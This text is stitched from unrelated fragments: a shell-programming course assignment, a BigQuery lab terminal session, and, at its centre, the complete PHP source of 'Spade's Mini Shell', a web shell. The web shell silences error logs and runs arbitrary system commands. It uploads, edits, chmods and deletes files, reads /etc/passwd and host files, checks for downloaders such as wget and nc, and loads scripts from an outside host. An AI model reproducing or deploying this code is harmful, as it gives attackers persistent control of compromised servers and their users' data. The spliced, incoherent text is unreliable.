such file or directory alex@~$ ls /var && ls /var && ls /var && ls /hbtn backups cache crash lib local lock log mail metrics opt run spool tmp backups cache crash lib local lock log mail metrics opt run spool tmp backups cache crash lib local lock log mail metrics opt run spool tmp ls: cannot access /hbtn: No such file or directory alex@~$ ls /var && ls /var && ls /var && ls /hbtn && ls /hbtn backups cache crash lib local lock log mail metrics opt run spool tmp backups cache crash lib local lock log mail metrics opt run spool tmp backups cache crash lib local lock log mail metrics opt run spool tmp ls: cannot access /hbtn: No such file or directory alex@~$ alex@~$ ls /var || ls /var backups cache crash lib local lock log mail metrics opt run spool tmp alex@~$ ls /hbtn || ls /var ls: cannot access /hbtn: No such file or directory backups cache crash lib local lock log mail metrics opt run spool tmp alex@~$ ls /hbtn || ls /hbtn || ls /hbtn || ls /var ls: cannot access /hbtn: No such file or directory ls: cannot access /hbtn: No such file or directory ls: cannot access /hbtn: No such file or directory backups cache crash lib local lock log mail metrics opt run spool tmp alex@~$ ls /hbtn || ls /hbtn || ls /hbtn || ls /var || ls /var ls: cannot access /hbtn: No such file or directory ls: cannot access /hbtn: No such file or directory ls: cannot access /hbtn: No such file or directory backups cache crash lib local lock log mail metrics opt run spool tmp alex@~$ Repo: GitHub repository: simple_shell 13. alias #advanced Simple shell 1.0 + Implement the alias builtin command Usage: alias [name[='value'] ...] alias: Prints a list of all aliases, one per line, in the form name='value' alias name [name2 ...]: Prints the aliases name, name2, etc 1 per line, in the form name='value' alias name='value' [...]: Defines an alias for each name whose value is given. If name is already an alias, replaces its value with value Repo: GitHub repository: simple_shell 14. Variables #advanced Simple shell 1.0 + Handle variables replacement Handle the $? variable Handle the $$ variable julien@ubuntu:~/shell$ ./hsh $ ls /var backups cache crash lib local lock log mail metrics opt run snap spool tmp $ echo $? 0 $ echo $$ 5104 $ echo $PATH /home/julien/bin:/home/julien/.local/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin $ exit julien@ubuntu:~/shell$ Repo: GitHub repository: simple_shell 15. Comments #advanced Simple shell 1.0 + Handle comments (#) julien@ubuntu:~/shell$ sh $ echo $$ # ls -la 5114 $ exit julien@ubuntu:~/shell$ Repo: GitHub repository: simple_shell 16. File as input #advanced Simple shell 1.0 + Usage: simple_shell [filename] Your shell can take a file as a command line argument The file contains all the commands that your shell should run before exiting The file should contain one command per line In this mode, the shell should not print a prompt and should not read from stdin Repo: GitHub repository: simple_shell

<?php // Spade's Mini Shell @ini_set('error_log',NULL); @ini_set('log_errors',0); @ini_set('display_errors', 0); @error_reporting(0); @error_log(false); $slash = '/'; if(strtolower(substr(PHP_OS,0,3))=='win'){ $os = 'win'; $slash = '\\'; $ox = "Windows";}else{ $os = "nix"; $ox = "Linux"; } function sanitize($object){ return filter_var(htmlspecialchars($object), FILTER_SANITIZE_STRING); } function get_users(){ $users = array(); $user = file("/etc/passwd"); foreach ($user as $userx => $userz) { $userct = explode(":", $userz); array_push($users,$userct[0]); } if(!$user){ if($open = opendir("/home/")){ while(($file = readdir($open)) !== false){ array_push($users, $file); } } closedir($open); } $users = implode(', ', $users); return $users; } function exe($cmd){ if(function_exists('system')) { @ob_start(); @system($cmd); $buff = @ob_get_contents(); @ob_end_clean(); }elseif(function_exists('exec')) { @exec($cmd,$results); $buff = join("\n", $results); } elseif(function_exists('passthru')) { @ob_start(); @passthru($cmd); $buff = @ob_get_contents(); @ob_end_clean(); } elseif(function_exists('shell_exec')) { $buff = @shell_exec($cmd); }elseif(function_exists('proc_open')){ $desc = array(0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w")); $handle = proc_open($cmd, $desc, $pipes); if(is_resource($handle)){ if(function_exists('fread') && function_exists('feof')){ while(!feof($pipes[1])){ $buff .= fread($pipes[1], 512); } }elseif(function_exists('fgets') && function_exists('feof')){ while(!feof($pipes[1])){ $buff .= fgets($pipes[1], 512); } } } pclose($handle); }elseif(function_exists('popen')){ $handle = popen($cmd, "r"); if(is_resource($handle)){ if(function_exists('fread') && function_exists('feof')){ while(!feof($handle)){ $buff .= fread($handle, 512); } }elseif(function_exists('fgets') && function_exists('feof')){ while(!feof($handle)){ $buff .= fgets($handle, 512); } } } pclose($handle); } $buff = wordwrap(htmlspecialchars($buff)); return $buff; } echo " <!DOCTYPE html> <html> <head> <link rel=\"shortcut icon\" href=\"http://i.imgur.com/iuhnNKU.png\" /> <meta name=\"ROBOTS\" content=\"NOINDEX, NOFOLLOW, NOARCHIVE\" /> <meta name=\"GOOGLEBOT\" content=\"NOINDEX, NOFOLLOW, NOARCHIVE\" /> <meta charset=\"UTF-8\"> <script type=\"text/javascript\" src=\"http://ajax.googleapis.com/ajax/libs/jquery/1.9.1/jquery.min.js\"></script> <link href='http://fonts.googleapis.com/css?family=Monoton' rel='stylesheet' type='text/css'> <title>:~Spade Mini Shell~:</title> <style> @import url(\"http://fonts.googleapis.com/css?family=Iceberg:400\"); *, body, html { text-shadow: 0px 0px 1px #141414; cursor: url(http://cur.cursors-4u.net/cursors/cur-9/cur863.ani), url(http://cur.cursors-4u.net/cursors/cur-9/cur863.png), default !important;} html {font-family: 'Iceberg';} .chekwa{ display: none;} .wala { border-bottom: none;} input { border: none; background: none; font-family: 'Courier New';} textarea{ background: #111111; font-family: 'Courier New'; font-size: 15px; border: 1px dashed lime; border-radius: 15px; padding: 10px; color: white;} .submit{ background: lime; color: black; } select{ background: lime; color: black; font-family: 'Courier New'; border: none;} option{ font-family: 'Courier New'; background: lime; border: none;} .titulo {text-shadow: 0pt 0pt 0.99em lime, 0pt 0pt 0.99em lime;color: #00ff00;text-decoration: none;} body { background: #111111; color: white; text-align : center;} .foot{ position: relative; width: 100%; bottom: 0;} a { color: white; text-decoration: none;} #details{ -moz-border-radius: 10px; border-radius: 10px; border:1px solid green; padding:4px 8px; line-height:16px; background:#111111; color:#aaa; margin:0 0 8px 0; min-height:100px; margin-top: 10px;} tr:hover { background: #141414;} a:hover { text-shadow: 0pt 0pt 0.99em lime, 0pt 0pt 0.99em lime;color: #00ff00;text-decoration: none; } .lamesa, .mesa { width:100%; padding:4px 0; color:white; font-size:15px;} .mesa td{ border-bottom:1px solid #222222; padding:0 8px; line-height:24px; vertical-align:top;} .board {text-align: center;border: 1px solid rgba(255,180,0,0.4);border-radius: 4px;width: 500px;font-family: 'Monoton'} .board p {font-size: 65px;font-family: 'Monoton', cursive;color: #fff;text-transform: uppercase;padding: 0;margin: 0;} pre { text-align: left;} .pare{ border: 1px dashed lime; border-radius: 15px; color: #9b9b9b; font-size: 15px; font-family: 'Courier New'; padding: 15px;} textarea:focus{ outline: none;} .piktur { width: 60px; cursor: pointer; opacity: .5; transition: .5s ease-in-out;} .piktur:hover { opacity: 1; width: 75px;} code { font-family: monospace; } </style>";?> <script type="text/javascript"> $(document).ready(function() {$('#spade').novacancy({'reblinkProbability': 0.1,'blinkMin': 0.2,'blinkMax': 0.6,'loopMin': 8,'loopMax': 10,'color': '#ffffff','glow': ['0 0 80px #ffffff', '0 0 30px #008000', '0 0 6px #0000ff']}); $('#pirates').novacancy({'blink': 1,'off': 1,'color': 'Red','glow': ['0 0 80px Red', '0 0 30px FireBrick', '0 0 6px DarkRed']});}); </script> <?php echo " </head> <body> <noscript><meta http-equiv=\"refresh\" content=\"0; URL=http://xbox.nu/sssssssssssppppppppppaaaaaaaaaaaadddddddeeeeeeeee.html\"></noscript> <center><div class=\"board\" style=\"width: 30%;\"><p id=\"spade\">Spade</p><p id=\"pirates\">Mini Shell</p></div></center> <div id='details'> <table class=\"lamesa\" cellpadding=\"3\" cellspacing\"1\"> <tr> <td><font class=\"titulo wala\">Directory:~$</font>&nbsp;"; if(isset($_GET['path'])){ $path = sanitize($_GET['path']); }else{ $path = sanitize(getcwd()); } $path = str_replace('\\','/',$path); $paths = explode('/',$path); foreach($paths as $id=>$peth){ if($peth == '' && $id == 0){ $a = true; echo "<a href=\"?path=/\">/</a>"; continue; }//if if($peth == '') continue; echo "<a href='?path="; for($i=0;$i<=$id;$i++){ echo $paths[$i]; if($i != $id) echo "/"; }//for echo "'>".$peth."</a>/"; }//foreach echo " </td> </tr> <tr> <td>"; if(isset($_FILES['file'])){ if(@copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){ echo "<font color=lime><a href=".sanitize($_FILES['file']['name'])." target='_blank'>File Uploaded!</font><br/>"; }else{ echo "<font color=red>File Not Uploaded!</font><br/>"; }//upload }//file echo " <form method=POST enctype=\"multipart/form-data\"><font class=\"titulo wala\">Upload File<br><label for=\"upload\"><img class=\"piktur\" src=\"http://xbox.nu/upload.png\"><input id=\"upload\" class=\"chekwa\" type=\"file\" name=\"file\"></label><br><input type=\"submit\" class=\"submit\" "; if(!is_writable($path)){echo "disabled value='Not Writable!' style='background: red;'";}else{ echo "value='Upload!'"; } echo " ></form> </td> </tr><tr><td class=\"wala\">[<a href=".sanitize($_SERVER['PHP_SELF']).">Home</a>]&nbsp;[<a href='?details'>System Details</a>]&nbsp;[<a href='?kill'>Kill Me</a>]</td></tr></table></div><table>"; if(isset($_GET['details'])){ global $os; $ds = @ini_get("disable_functions"); $show_ds = (!empty($ds)) ? "<font color=red>".sanitize(wordwrap($ds))."</font>" : "<font color=gold>NONE</font>"; echo "</table><div id=\"details\"><table class=\"mesa\" width=100%><center> <tr><td><h1 class=titulo>System Information</h1></td></tr> <tr><td><font color=lime>OS</font>:: <font color=gold>".php_uname(s)."</font></td></tr> <tr><td><font color=lime>PHP Version</font>:: <font color=gold>".phpversion()."</font></td></tr> <tr><td><font color=lime>Kernel Release</font>:: <font color=gold>".php_uname(r)."</font></td></tr> <tr><td><font color=lime>Kernel Version</font>:: <font color=gold>".php_uname(v)."</font></td></tr> <tr><td><font color=lime>Machine</font>:: <font color=gold>".php_uname(m)."</font></td></tr> <tr><td><font color=lime>Server Software</font>:: <font color=gold>".$_SERVER['SERVER_SOFTWARE']."</font></td></tr> <tr><td style=\"text-align:left\"><font color=lime>Disabled Functions</font>:: <font color=gold>".wordwrap($show_ds)."</font></td></tr>"; if(function_exists('apache_get_modules')){ echo "<tr><td style=\"text-align:left\"><font color=lime>Loaded Apache Modules</font>:: <pre>"; $apache = implode(', ', apache_get_modules()); echo wordwrap($apache); echo "</pre></td></tr>"; }//apache if($os == 'win'){echo "<tr><td style=\"text-align:left\"><font color=lime>Account Settings</font>:: <pre>".exe('net accounts')."</pre></td></tr><tr><td style=\"text-align:left\"><font color=lime>User Accounts</font>:: <pre>".exe('net user')."</pre></td></tr>";}//Windows if($os == 'nix'){ echo "<tr><td style=\"text-align:left\"><font color=lime>Distro</font>:: <pre>".exe('cat /etc/*-release')."</pre></td></tr> <tr><td style=\"text-align:left\"><font color=lime>Distro Name</font>:: <pre>".exe('cat /etc/issue.net')."</pre></td></tr> <tr><td style=\"text-align:left\"><font color=lime>GCC</font>:: <pre>".exe('whereis gcc')."</pre></td></tr> <tr><td style=\"text-align:left\"><font color=lime>Perl</font>:: <pre>".exe('whereis perl')."</pre></td></tr> <tr><td style=\"text-align:left\"><font color=lime>Java</font>:: <pre>".exe('whereis java')."</pre></td></tr> <tr><td style=\"text-align:left\"><font color=lime>Python</font>:: <pre>".exe('whereis python')."</pre></td></tr> <tr><td style=\"text-align:left\"><font color=lime>Apache</font>:: <pre>".exe('whereis apache')."</pre></td></tr> <tr><td style=\"text-align:left\"><font color=lime>CPU</font>:: <pre>".exe('cat /proc/cpuinfo')."</pre></td></tr> <tr><td style=\"text-align:left\"><font color=lime>RAM</font>:: <pre>".exe('free -m')."</pre></td></tr> <tr><td style=\"text-align:left\"><font color=lime>User Limits</font>:: <pre>".exe('ulimit -a')."</pre></td></tr> "; $useful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl'); $uze=array(); foreach($useful as $uzeful){ if(exe("which $uzeful")){ $uze[]=$uzeful; } } echo "<tr><td style='text-align:left'><font color=lime>Useful</font>::<pre>"; echo implode(', ',$uze); echo "</pre></td></tr>"; $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror'); $uze=array(); foreach($downloaders as $downloader){ if(exe("which $downloader")){ $uze[]=$downloader; } } echo "<tr><td style='text-align:left'><font color=lime>Downloaders</font>::<pre>"; echo implode(', ',$uze); echo "</pre></td></tr>"; echo "<tr><td style='text-align:left'><font color=lime>Users</font>::<pre>".wordwrap(get_users())."</pre</font></td></tr> <tr><td style='text-align:left'><font color=lime>Hosts</font>::<pre>".exe('cat /etc/hosts')."</pre></font></td></tr>"; }//Linux echo "</table></div>"; }elseif(isset($_GET['kill'])){ $me = sanitize($_SERVER['PHP_SELF']); $akez = basename($me); if(unlink($akez)){ echo "<script>alert('Sayonara Suckers .|.')</script><meta http-equiv=\"refresh\" content=\"0; URL=http://xbox.nu/r3dDXDTOOL.swf\">"; }else{ echo "<center><font color=red>Still Alive!</font></center>"; } }elseif(isset($_GET['filesource'])){ echo "<tr><td class=\"titulo\"><center>Current File:~$&nbsp;".sanitize($_GET['filesource'])."</center></td></tr></table><br/>"; echo "<pre class=\"pare\"><code>".wordwrap(sanitize(file_get_contents($_GET['filesource'])))."</code></pre>"; }elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){ echo "</table><br><center>".sanitize($_GET['path'])."<br><br>"; if($_POST['opt'] == 'chmod'){ if(isset($_POST['perm'])){ if(@chmod($_POST['path'], $_POST['perm'])){ echo "<font color=lime>Permission Changed!</font>"; }else{ echo "<font color=red>Permission Not Change!</font>"; }//change perm * chmod }//perm echo "<form method=POST><font class=\"titulo\">Permission:~$&nbsp;</font><input type=\"text\" name=\"perm\" size=\"4\" value='".substr(sprintf('%o', fileperms($_POST['path'])), -4)."'><input type=\"hidden\" name=\"path\" value='".$_POST['path']."'><input type=\"hidden\" name=\"opt\" value=\"chmod\"><input type=\"submit\" class=\"submit\" value=\">>\"></form>"; }elseif($_POST['opt'] == 'rename'){ if(isset($_POST['newname'])){ if(rename($_POST['path'],$path.'/'.$_POST['newname'])){ echo "<font color=lime>File Name Changed!</font><br>"; }else{ echo "<font color=red>File Name Not Change!</font>"; }//rename $_POST['name'] = $_POST['newname']; }//rename echo "<form method=POST><font class=\"titulo\">New Name:~$&nbsp;</font><input name= \"newname\" type=\"text\" size=\"20\" value='".sanitize($_POST['name'])."'><input type=\"hidden\" name=\"path\" value='".sanitize($_POST['path'])."'><input type=\"hidden\" name=\"opt\" value=\"rename\"><input type=\"submit\" class=\"submit\" value=\">>\"></form>"; }elseif($_POST['opt'] == 'edit'){ if(isset($_POST['source'])){ $fopen = fopen($_POST['path'], 'w'); if(fwrite($fopen, $_POST['source'])){ echo "<font color=lime>File Editted!</font><br>"; }else{ echo "<font color=red>File Not Editted!</font><br>"; }//fwrite fclose($fopen); }//source echo "<form method=POST><textarea cols=80 rows=20 name=\"source\">".sanitize(file_get_contents($_POST['path']))."</textarea><br><input type=\"hidden\" name=\"path\" value='".sanitize($_POST['path'])."'><input type=\"hidden\" name=\"opt\" value=\"edit\"><input type=\"submit\" class=\"submit\" value=\">>\"></form>"; }//chmod//rename//edit echo "</center>"; }else{ echo "</table><br></center>"; if(isset($_GET['option']) && $_POST['opt'] == 'delete'){ if($_POST['type'] == 'dir'){ if(rmdir($_POST['path'])){ echo "<font color=lime>Directory Deleted!</font><br>"; }else{ echo "<font color=red>Directory Not Deleted!</font><br>"; }//rmdir }elseif($_POST['type'] == 'file'){ if(unlink($_POST['path'])){ echo "<font color=lime>File Deleted!</font><br>"; }else{ echo "<font color=red>File Not Deleted!</font><br>"; }//unlink }//dir//file }//delete echo "</center>"; $scandir = scandir($path); echo " <div class=\"content\" id=\"details\"> <table class=\"lamesa\" cellpadding=\"3\" cellspacing=\"1\"> <tr> <th><font class=\"titulo\">Name</font></th> <th><font class=\"titulo\">Size</font></th> <th><font class=\"titulo\">Permissions</font></th> <th><font class=\"titulo\">Options</font></th> </tr>"; foreach($scandir as $dir){ if(!is_dir($path.'/'.$dir) || $dir == '.' || $dir == '..') continue; echo " <tr> <td><a href=\"?path=".$path."/".$dir."\">".$dir."</a></td> <td><center>~</center></td> <td><center>"; if(is_writable($path.'/'.$dir)) echo "<font color=lime>";//is_writable elseif(!is_readable($path.'/'.$dir)) echo "<font color=red>";//is_readable echo perms($path.'/'.$dir); if(is_writable($path.'/'.$dir) || !is_readable($path.'/'.$dir)) echo "</font>"; echo "</center></td> <td><center> <form method=POST action=\"?option&path=".$path."\"> <select name=\"opt\"> <option value=\"\"></option> <option value=\"delete\">Delete</option> <option value=\"chmod\">Chmod</option> <option value=\"rename\">Rename</option> </select> <input type=\"hidden\" name=\"type\" value=\"dir\"> <input type=\"hidden\" name=\"name\" value='".$dir."> <input type=\"hidden\" name=\"path\" value='".$path."/".$dir."> <input type=\"submit\" class=\"submit\" value=\">>\"> </form> </center></td> </tr>"; }//foreach echo " <tr> <td>----------------</td><td>----------------</td><td>----------------</td><td>----------------</td> </tr>"; foreach($scandir as $file){ if(!is_file($path.'/'.$file)) continue;//is_file $size = filesize($path.'/'.$file)/1024; $size = round($size,3); if($size >= 1024){ $size = round($size/1024,2).' MB'; }else{ $size = $size.' KB'; }//size echo " <tr> <td><a href=\"?filesource=".$path."/".$file."&path=".$path."\">".$file."</a></td> <td><center>".$size."</center></td> <td><center>"; if(is_writable($path.'/'.$file)) echo "<font color=lime>";//is_writable elseif(!is_readable($path.'/'.$file)) echo "<font color=red>";//is_readable echo perms($path.'/'.$file); if(is_writable($path.'/'.$file) || !is_readable($path.'/'.$file)) echo "</font>"; echo "</center></td> <td><center> <form method=POST action=\"?option&path=".$path."\"> <select name=\"opt\"> <option value=\"\"></option> <option value=\"edit\">Edit</option> <option value=\"delete\">Delete</option> <option value=\"chmod\">Chmod</option> <option value=\"rename\">Rename</option> </select> <input type=\"hidden\" name=\"type\" value=\"file\"> <input type=\"hidden\" name=\"name\" value='".$file."'> <input type=\"hidden\" name=\"path\" value='".$path."/".$file."'> <input type=\"submit\" class=\"submit\" value=\">>\"> </form> </center></td> </tr>"; }//foreach echo " </table> </div>"; }//filesource//Delete echo " </table> <script type=\"text/javascript\" src=\"http://xbox.nu/novacancy.js\"></script> <div class='foot'> <hr width='80%'> <footer>&copy; <font color=lime class=titulo>Spade</font> ".date('Y')."</footer> </div> </body> </html>"; function perms($file){ $perms = fileperms($file); if (($perms & 0xC000) == 0xC000) { // Socket $info = 's'; } elseif (($perms & 0xA000) == 0xA000) { // Symbolic Link $info = 'l'; } elseif (($perms & 0x8000) == 0x8000) { // Regular $info = '-'; } elseif (($perms & 0x6000) == 0x6000) { // Block special $info = 'b'; } elseif (($perms & 0x4000) == 0x4000) { // Directory $info = 'd'; } elseif (($perms & 0x2000) == 0x2000) { // Character special $info = 'c'; } elseif (($perms & 0x1000) == 0x1000) { // FIFO pipe $info = 'p'; } else { // Unknown $info = 'u'; } // Owner $info .= (($perms & 0x0100) ? 'r' : '-'); $info .= (($perms & 0x0080) ? 'w' : '-'); $info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-')); // Group $info .= (($perms & 0x0020) ? 'r' : '-'); $info .= (($perms & 0x0010) ? 'w' : '-'); $info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-')); // World $info .= (($perms & 0x0004) ? 'r' : '-'); $info .= (($perms & 0x0002) ? 'w' : '-'); $info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-')); return $info; } ?>

PowerShell module for working with Texas Instruments TMP102 temp sensor.

Welcome to Cloud Shell! Type "help" to get started. Your Cloud Platform project in this session is set to qwiklabs-gcp-00-caaddc51ae14. Use “gcloud config set project [PROJECT_ID]” to change to a different project. student_00_bea2289b69fb@cloudshell:~ (qwiklabs-gcp-00-caaddc51ae14)$ gcloud auth list Credentialed Accounts ACTIVE: * ACCOUNT: student-00-bea2289b69fb@qwiklabs.net To set the active account, run: $ gcloud config set account `ACCOUNT` student_00_bea2289b69fb@cloudshell:~ (qwiklabs-gcp-00-caaddc51ae14)$ gcloud config list project [core] project = qwiklabs-gcp-00-caaddc51ae14 Your active configuration is: [cloudshell-633] student_00_bea2289b69fb@cloudshell:~ (qwiklabs-gcp-00-caaddc51ae14)$ gcloud config set accessibility/screen_reader true Updated property [accessibility/screen_reader]. student_00_bea2289b69fb@cloudshell:~ (qwiklabs-gcp-00-caaddc51ae14)$ gcloud config set project <project-id> -bash: syntax error near unexpected token `newline' student_00_bea2289b69fb@cloudshell:~ (qwiklabs-gcp-00-caaddc51ae14)$ gcloud config set project <project-id> -bash: syntax error near unexpected token `newline' student_00_bea2289b69fb@cloudshell:~ (qwiklabs-gcp-00-caaddc51ae14)$ ls README-cloudshell.txt student_00_bea2289b69fb@cloudshell:~ (qwiklabs-gcp-00-caaddc51ae14)$ bq show bigquery-public-data:samples.shakespeare Table bigquery-public-data:samples.shakespeare Last modified Schema Total Rows Total Bytes Expiration Time Partitioning Clustered Fields Labels ----------------- ------------------------------------ ------------ ------------- ------------ ------------------- ------------------ -------- 14 Mar 17:16:45 |- word: string (required) 164656 6432064 |- word_count: integer (required) |- corpus: string (required) |- corpus_date: integer (required) student_00_bea2289b69fb@cloudshell:~ (qwiklabs-gcp-00-caaddc51ae14)$ bq help query Python script for interacting with BigQuery. USAGE: bq.py [--global_flags] <command> [--command_flags] [args] query Execute a query. Query should be specified on command line, or passed on stdin. Examples: bq query 'select count(*) from publicdata:samples.shakespeare' echo 'select count(*) from publicdata:samples.shakespeare' | bq query Usage: query [<sql_query>] Flags for query: /usr/lib/google-cloud-sdk/platform/bq/bq.py: --[no]allow_large_results: Enables larger destination table sizes for legacy SQL queries. --[no]append_table: When a destination table is specified, whether or not to append. (default: 'false') --[no]batch: Whether to run the query in batch mode. Ignored if --priority flag is specified. --clustering_fields: Comma-separated list of field names that specifies the columns on which a table is clustered. To remove the clustering, set an empty value. --connection_property: Connection properties; repeat this option to specify a list of values --[no]create_session: Whether to create a new session and run the query in the sesson. --destination_kms_key: Cloud KMS key for encryption of the destination table data. --destination_schema: Schema for the destination table. Either a filename or a comma-separated list of fields in the form name[:type]. (default: '') --destination_table: Name of destination table for query results. (default: '') --display_name: Display name for the created scheduled query configuration. (default: '') --[no]dry_run: Whether the query should be validated without executing. --external_table_definition: Specifies a table name and either an inline table definition or a path to a file containing a JSON table definition to use in the query. The format is "table_name::path_to_file_with_json_def" or "table_name::schema@format=uri@connection". Note using connection is an experimental feature and is still under development.For example, "--external_table_definition=Example::/tmp/example_table_def.txt" will define a table named "Example" using the URIs and schema encoded in example_table_def.txt.; repeat this option to specify a list of values --[no]flatten_results: Whether to flatten nested and repeated fields in the result schema for legacy SQL queries. If not set, the default behavior is to flatten. --job_timeout_ms: Maximum time to run the entire script. --label: A label to set on a query job. The format is "key:value"; repeat this option to specify a list of values --max_child_jobs: Maximum number of child jobs to fetch results from after executing a script. If the number of child jobs exceeds this limit, only the final result will be displayed. (default: '1000') (an integer) -n,--max_rows: How many rows to return in the result. (default: '100') (an integer) --max_statement_results: Maximum number of script statements to display the results for. (default: '100') (an integer) --maximum_billing_tier: The upper limit of billing tier for the query. (an integer) --maximum_bytes_billed: The upper limit of bytes billed for the query. (an integer) --min_completion_ratio: [Experimental] The minimum fraction of data that must be scanned before a query returns. If not set, the default server value (1.0) will be used. (a number in the range [0, 1.0]) --parameter: Either a file containing a JSON list of query parameters, or a query parameter in the form "name:type:value". An empty name produces a positional parameter. The type may be omitted to assume STRING: name::value or ::value. The value "NULL" produces a null value.; repeat this option to specify a list of values --priority: <HIGH|INTERACTIVE|BATCH>: Query priority. If not specified, priority is determined using the --batch flag. Options include: HIGH (only available for whitelisted reservations) INTERACTIVE BATCH --range_partitioning: Enables range partitioning on the table. The format should be "field,start,end,interval". The table will be partitioned based on the value of the field. Field must be a top-level, non-repeated INT64 field. Start, end, and interval are INT64 values defining the ranges. --[no]replace: If true, erase existing contents before loading new data. (default: 'false') --request_id: The request_id to use for the jobs.query request. Only valid when used in combination with --rpc. --[no]require_cache: Whether to only run the query if it is already cached. --[no]require_partition_filter: Whether to require partition filter for queries over this table. Only apply to partitioned table. --[no]rpc: If true, use rpc-style query API instead of jobs.insert(). (default: 'false') --schedule: Scheduled query schedule. If non-empty, this query requests could create a scheduled query understand the customer project. See https://cloud.google.com/appengine/docs/flexible/python/scheduling-jobs-with-cron-yaml#the_schedule_format for the schedule format --schema_update_option: Can be specified when append to a table, or replace a table partition. When specified, the schema of the destination table will be updated with the schema of the new data. One or more of the following options can be specified: ALLOW_FIELD_ADDITION: allow new fields to be added ALLOW_FIELD_RELAXATION: allow relaxing required fields to nullable; repeat this option to specify a list of values --script_statement_byte_budget: Maximum bytes that can be billed for any statement in a script. --script_statement_timeout_ms: Maximum time to complete each statement in a script. --session_id: An existing session id where the query will be run. -s,--start_row: First row to return in the result. (default: '0') (an integer) --target_dataset: Target dataset used to create scheduled query. --time_partitioning_expiration: Enables time based partitioning on the table and sets the number of seconds for which to keep the storage for the partitions in the table. The storage in a partition will have an expiration time of its partition time plus this value. (an integer) --time_partitioning_field: Enables time based partitioning on the table and the table will be partitioned based on the value of this field. If time based partitioning is enabled without this value, the table will be partitioned based on the loading time. --time_partitioning_type: Enables time based partitioning on the table and set the type. The default value is DAY, which will generate one partition per day. Other supported values are HOUR, MONTH, and YEAR. --udf_resource: The URI or local filesystem path of a code file to load and evaluate immediately as a User-Defined Function resource.; repeat this option to specify a list of values --[no]use_cache: Whether to use the query cache to avoid rerunning cached queries. --[no]use_legacy_sql: Whether to use Legacy SQL for the query. If not set, the default value is true. absl.flags: --flagfile: Insert flag definitions from the given file into the command line. (default: '') --undefok: comma-separated list of flag names that it is okay to specify on the command line even if the program does not define a flag with that name. IMPORTANT: flags in this list that have arguments MUST use the --flag=value format. (default: '') Run 'bq.py --help' to get help for global flags. Run 'bq.py help' to see the list of available commands. student_00_bea2289b69fb@cloudshell:~ (qwiklabs-gcp-00-caaddc51ae14)$ bq query --use_legacy_sql=false \ 'SELECT word, SUM(word_count) AS count FROM `bigquery-public-data`.samples.shakespeare WHERE word LIKE "%raisin%" GROUP BY word' +---------------+-------+ | word | count | +---------------+-------+ | praising | 8 | | Praising | 4 | | raising | 5 | | dispraising | 2 | | dispraisingly | 1 | | raisins | 1 | +---------------+-------+ student_00_bea2289b69fb@cloudshell:~ (qwiklabs-gcp-00-caaddc51ae14)$ bq query --use_legacy_sql=false \ 'SELECT word FROM `bigquery-public-data`.samples.shakespeare WHERE word = "huzzah"' student_00_bea2289b69fb@cloudshell:~ (qwiklabs-gcp-00-caaddc51ae14)$ bq ls student_00_bea2289b69fb@cloudshell:~ (qwiklabs-gcp-00-caaddc51ae14)$ 200~bq ls bigquery-public-data:~ -bash: 200~bq: command not found student_00_bea2289b69fb@cloudshell:~ (qwiklabs-gcp-00-caaddc51ae14)$ bq ls student_00_bea2289b69fb@cloudshell:~ (qwiklabs-gcp-00-caaddc51ae14)$ bq ls bigquery-public-data: datasetId ------------------------------------- austin_311 austin_bikeshare austin_crime austin_incidents austin_waste baseball bitcoin_blockchain blackhole_database bls bls_qcew breathe broadstreet_adi catalonian_mobile_coverage catalonian_mobile_coverage_eu census_bureau_acs census_bureau_construction census_bureau_international census_bureau_usa census_utility cfpb_complaints chicago_crime chicago_taxi_trips cloud_storage_geo_index cms_codes cms_medicare cms_synthetic_patient_data_omop covid19_aha covid19_ecdc covid19_ecdc_eu covid19_geotab_mobility_impact covid19_geotab_mobility_impact_eu covid19_google_mobility covid19_google_mobility_eu covid19_govt_response covid19_italy covid19_italy_eu covid19_jhu_csse covid19_jhu_csse_eu covid19_nyt covid19_open_data covid19_open_data_eu covid19_public_forecasts covid19_public_forecasts_asia_ne1 covid19_rxrx19 covid19_symptom_search covid19_tracking covid19_usafacts covid19_vaccination_access covid19_vaccination_search_insights covid19_weathersource_com student_00_bea2289b69fb@cloudshell:~ (qwiklabs-gcp-00-caaddc51ae14)$ bq mk babynames Dataset 'qwiklabs-gcp-00-caaddc51ae14:babynames' successfully created. student_00_bea2289b69fb@cloudshell:~ (qwiklabs-gcp-00-caaddc51ae14)$ bq ls datasetId ----------- babynames student_00_bea2289b69fb@cloudshell:~ (qwiklabs-gcp-00-caaddc51ae14)$ curl -LO http://www.ssa.gov/OACT/babynames/names.zip % Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0 100 7231k 100 7231k 0 0 270k 0 0:00:26 0:00:26 --:--:-- 294k student_00_bea2289b69fb@cloudshell:~ (qwiklabs-gcp-00-caaddc51ae14)$ ls names.zip README-cloudshell.txt student_00_bea2289b69fb@cloudshell:~ (qwiklabs-gcp-00-caaddc51ae14)$ unzip names.zip Archive: names.zip inflating: yob1880.txt inflating: yob1881.txt inflating: yob1882.txt inflating: yob1883.txt inflating: yob1884.txt inflating: yob1885.txt inflating: yob1886.txt inflating: yob1887.txt inflating: yob1888.txt inflating: yob1889.txt inflating: yob1890.txt inflating: yob1891.txt inflating: yob1892.txt inflating: yob1893.txt inflating: yob1894.txt inflating: yob1895.txt inflating: yob1896.txt inflating: yob1897.txt inflating: yob1898.txt inflating: yob1899.txt inflating: yob1900.txt inflating: yob1901.txt inflating: yob1902.txt inflating: yob1903.txt inflating: yob1904.txt inflating: yob1905.txt inflating: yob1906.txt inflating: yob1907.txt inflating: yob1908.txt inflating: yob1909.txt inflating: yob1910.txt inflating: yob1911.txt inflating: yob1912.txt inflating: yob1913.txt inflating: yob1914.txt inflating: 